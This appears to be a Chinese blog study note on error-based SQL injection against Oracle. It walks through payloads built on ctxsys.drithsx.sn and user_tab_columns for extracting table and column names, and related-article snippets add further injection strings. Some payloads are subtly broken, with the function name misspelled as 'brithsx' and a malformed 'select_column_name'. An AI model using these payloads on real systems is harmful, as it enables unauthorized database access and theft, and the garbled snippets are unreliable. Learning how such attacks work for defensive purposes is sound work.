数据库注入学习笔记4---Oracle注入(报错注入)

最新推荐文章于 2024-05-04 20:29:53 发布
最新推荐文章于 2024-05-04 20:29:53 发布
阅读量609 收藏
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41759633/article/details/98753389
版权
本文详细探讨了Oracle数据库的注入攻击,特别是报错注入的方法。通过利用网页错误信息获取数据,例如利用'ctxsys.brithsx.sn()'触发报错。首先,我们了解到'Dual'是Oracle的系统表,'rownum=1'类似LIMIT操作。接着,通过条件如'and table_name<>‘ADMIN’'来排除特定表。作者展示了如何查询库名、表名,并逐步排除已知表以获取更多信息,最后还涉及了查询字段及内容的技巧。
摘要由CSDN通过智能技术生成

其原理在于在网页报错得到一个数据信息来进行注入:

先看以下不同:
Dual Oracle中的系统表
rownum=1 与limit相似
and table name<>‘ADMIN’ 暂时理解为排除某个表或者字段

使用 ?id=1’ 产生报错信息

使用 ctxsys.brithsx.sn() 进行报错注入
查询库名

在这里插入图片描述
查询表名
在这里插入图片描述
把admin排除查询第二个表,同样的把查询出来的NEWS排除得到第三个字段在后面加上语句:
and table_name<>‘ADMIN’ and table_name<>‘NEWS’
在这里插入图片描述
查询字段:
查询第一个字段

?id=-1' and 1=ctxsys.drithsx.sn(1,(select_column_name from user_tab_columns where table_name='字段名1' and rownum=1))

查询第N个字段

最低0.47元/天 解锁文章
超级滑稽帝本人
关注
专栏目录
Node.js学习笔记--进阶之路
JackieDYH的博客
05-10 1863
简介 Node 是一个软件, 可以脱离浏览器, 独立执行JS文件 Node实现了ECMAScript标准, 所以语言跟JavaScript基本一致 因为想成为全栈开发(前后端都可以的大拿) PHP等语言是阻塞的, 性能不如nodeJS node是事件驱动, 非阻塞的 Node中是大量的, 事件和回调函数 单线程(主线程单线程,后台I/O线程池) 跨平台 (Node软件可以安装在window系统/linux系统/mac系统/等等) 安装Node ...
Oracle-报错注入
weixin_45634365的博客
03-05 523
一、Oracle数据库简介 Oracle数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品,是一种关系数据库数据库体量较大,一般与jsp网站联合。 常见的数据库:MySQL、MSSQL、Access、Oracle Oracle使用免费,但如果使用中的数据库遇到了问题,例如数据丢失、数据库打不开等等,想要解决问题,就必须寻找Oracle官方的服务,而服务价格不菲,而这就是Oracle的盈利方式。 Oracle比MySQL、MSSQL、Access更为先进,对大数据的处理能力
Oracle注入——报错注入
m0_55854679的博客
02-19 2814
SQL注入之重新认识 文章目录Oracle数据库dual表数据库语句报错注入函数解析练习 Oracle数据库 一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。 dual表 Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,那么要它有什么用呢?
Oracle注入
秋水的博客
09-03 6500
Oracle数据库 Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 既然是关系数据库,肯定也是存在一些关系表,在Oracle数据库中,库的概念被淡化,强调用户 Oracle注入之联合查询 注入原理 其注入原理与MySQL一致,都是基于回显的注入,通过union all select来获取我们想要的数据 引入知识 dual表,此表是Oracle数...
学习笔记Oracle报错注入
chualam的博客
11-17 236
||utl_inaddr. get_host_name id=1||utl_inaddr. get_host_name((select banner from v$version where rownum=1)) 爆数据库版本 id=1||utl_inaddr. get_host_name((select owner from all_tables where rownum=1)) 爆库名 id=1||utl_inaddr. get_host_name((select owner from all_tabl
数据库注入学习笔记9---简单的数据库注入
qq_41759633的博客
08-08 406
Access注入 介绍: 微软的小型数据库 优势: 提高速度和编码量 缺陷: 数据过大性能下降 后缀名:*.mdb 调用分析: 连接分析… 先找注入注入原理: 查询注入语句 ’ and 1=1 and 1=2 or 1=1 or 1=2 and 1=23 判断数据库类型: and exeits (select * from msysobjects) > 0 判断access and ...
sqli-labs学习笔记(十二)less 38-45 堆叠注入
闵行小鱼塘
09-19 486
继续学习sqli-labs,本篇是less 38-45
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
最新发布
2301_82242964的博客
05-04 650
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
19、注入篇--报错注入Oracle
WX公众号-小白学安全
04-10 792
Oracle概述 1、Oracle数据库属于甲骨文公司,关系型数据库管理系统,数据库 2、讲究语法严谨 select 字段名 from 表名 3、dual表—>虚表 专门用于满足数据库语句结构的表 大部分数据库是数据敏感大小写,语句是不敏感大小写 4、Oracle系统自带表: 没有库的概念,只有用户的概念 查询出所有的表: select from all_tables 查询用户所创建的表:select from user_tables 查询所有的字段:select from all_tab_colum
网络安全零基础入门(第六章-5)Oracle注入——报错注入
素笺
04-09 212
每日一句:没有学不会的东西,只有不努力的man 本篇内容:注入函数解析      报错注入+联合查询(union all)      实战注意 一、注入函数解析 1.提示:     Oracle注入比较麻烦,有点小难要有心理准备,原因是Oracle数据库本身比较复杂           2.报错注入原理     报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。          ...
Oracle注入--报错注入
weixin_52351575的博客
10-02 888
一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。
oracle报错注入
笔墨稠思
11-25 2257
Oracle报错注入原理 通过ctxsys.drithsx.sn(user,查询语句)函数来根据页面报错获取我们需要的内容 注意事项: 1.oracle数据库在查询时,必须写表名,如果表不存在可以使用虚表 dual 2.Oracle数据库的字段数据类型是强匹配,必须保持数据类型相同 3.Oracle系统表 all_tables、user_tables、all_tab_columns、user_tab_columns 4.oracle限制查询结果返回的数量用rownum 靶场:http://59.63.2
封神台Oracle注入- 报错注入
qq_40941912的博客
10-05 1046
一、原理 跟MySQL的注入一样,都是程序原本要执行的sql语句拼接了用户输入的语句,导致出现了不该出现的数据。不同的数据库使用的函数不同,Oracle使用的是ctxsys.drithsx.sn函数实现报错注入。 二、作业 Oracle注入- 报错注入 (Rank: 5) 在id=1 后添加and 1=1 发现页面可以正常显示,推断此处可能存在注入点 通过报错注入函数查询当前表名:and 1=ctxsys.drithsx.sn(1,(select table_name from user_tabl
Oracle -- 报错注入
qq_68233961的博客
08-21 935
Oracle -- 报错注入
oracle——显错注入报错注入
qq_45300786的博客
08-14 844
http://59.63.200.79:8808/index_x.php 这个网址提供了,Oracle数据库接口,我们就可以直接用这个,而不用自己搭建了。 dual这个是一个虚表,是不存在的,是为了专门满足格式而存在的一个表。 因为你Oracle不像mysql一样,后面不加表也行,他是必须加个表名满足格式,但是为了方便就提供了dual这个表。 Oracle弱化了库的概念,强化了用户的概念。就是说把库换成了用户来查询数据。 oracle里面有多个条数据,他就排序多少个rownum,有点像mysql里的i
Oracle数据库--报错注入
Y22Lee的博客
04-01 1066
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。dual 是Oracle库中特有的一个单行单列的虚拟表,Oracle中的一个实际存在的表,任何用户均可读取,常用在没有目标表的Select语句块中。Oracle中弱化了库的概念,用户被强化,即:通俗的讲一个用户一个库。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。r=1取第一条数据,r=2取第二条数据。利用子查询和别名,将数据的编号固定住,这样修改r的值即可取出对应的第几条数据。
Oracle数据库管理:TIPTOP课程笔记-第4部分
"大班课 ORACLE部分-4的培训资料,主要涵盖了Oracle数据库管理,由鼎捷软件股份有限公司华南营运区T方案交付中心提供。课程内容包括常见操作、数据导出与导入、TIPTOP工具相关脚本、Oracle表的逻辑与物理结构、数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

超级滑稽帝本人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值